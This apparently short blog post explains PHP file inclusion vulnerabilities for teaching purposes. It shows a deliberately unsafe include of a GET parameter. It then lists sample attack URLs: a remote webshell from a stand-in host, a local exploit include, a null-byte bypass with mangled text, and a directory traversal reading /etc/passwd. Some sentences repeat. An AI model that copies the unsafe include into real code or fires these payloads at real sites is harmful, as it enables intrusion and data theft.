File inclusion vulnerability is a type of vulnerability most often found on websites.
It allows an attacker to include a file, usually through a script on the web server.
The vulnerability occurs due to the use of user-supplied input without proper validation.
This can lead to something as minimal as outputting the contents of the file or more serious events such as:
It allows an attacker to include a file, usually through a script on the web server.
The vulnerability occurs due to the use of user-supplied input without proper validation.
This can lead to something as minimal as outputting the contents of the file or more serious events such as:
- Code execution on the web server
- Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS)
- Denial of service (DoS)
- Data theft/manipulation
include and require statementsExample
<?php if ( isset( $_GET['COLOR'] ) ) { include( $_GET['COLOR'] . '.php' ); } ?>
<form method="get"> <select name="COLOR"> <option value="red">red</option> <option value="blue">blue</option> </select> <input type="submit"> </form>
Then hacker will include its infected page or file in to webserver
/vulnerable.php?COLOR=http://evil.example.com/webshell.txt?- injects a remotely hosted file containing a malicious code./vulnerable.php?COLOR=C:\\ftp\\upload\\exploit- Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability)/vulnerable.php?COLOR=C:\\notes.txt- example using NULL meta character to remove the.phpsuffix, allowing access to files other than .php. (Enabling magic_quotes_gpc limits the attack by escaping special characters, thus disabling the use of the NUL terminator)/vulnerable.php?COLOR=/etc/passwd- allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.
Post a Comment